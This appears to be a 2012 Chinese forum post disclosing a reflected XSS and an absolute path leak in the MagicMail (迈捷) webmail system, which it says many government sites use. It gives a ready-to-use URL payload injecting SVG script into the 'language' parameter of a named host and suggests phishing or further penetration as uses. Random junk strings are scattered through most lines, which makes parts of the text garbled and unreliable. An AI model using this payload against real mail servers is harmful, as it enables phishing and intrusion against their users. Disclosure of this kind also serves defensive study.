今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞7 [) C9 t. @8 J! @/ C, ]! f
5 I! M0 ]& W4 ] k. K: {8 Q9 p
/ Y. C+ q6 f; p0 L! F9 F3 w包含 一个反射性XSS 以及 绝对路径泄漏
6 D3 A# b7 [( _" |7 D5 |看了看 貌似全部是linux的。0 @3 i/ U+ i( [ o. P2 c, T, B8 b5 Y
0 ]9 f, N$ [. y/ [
关键字:迈捷邮件系统 by MagicMail
6 Z! [9 D- |, H0 y J
2 p; I5 M7 j; z- |( Z; z可以看到很多政府网站都用这个邮件系统+ L$ D8 O2 ?" ]. b. J& M T
: B, E0 N; e5 g# X1 d) n/ f绝对路径 http://madman.in/index.php?login_type=declare&language=
: t# y2 b! a7 @ _" M9 M6 e" ~ C3 a4 ~$ g& b4 [5 X Z6 s
+ g; u+ u% W; ~8 N: @1 w7 T9 _4 Y8 W) \
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
$ Q$ s: v5 g5 N2 K0 ], p" c9 p+ q, @, ~! Y5 [
4 W% J H6 w6 X1 a( G8 q3 H
, t' G+ ?( u1 u
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
. @+ A3 ^6 j1 b1 a8 O) h & e: n% v+ _0 Z x" V5 E6 U0 N2 J! t
修复方案:看官方补丁吧。
2 l* I+ q, E m! Z |
发表于 2012-11-9 20:38:41
收藏
支持
反对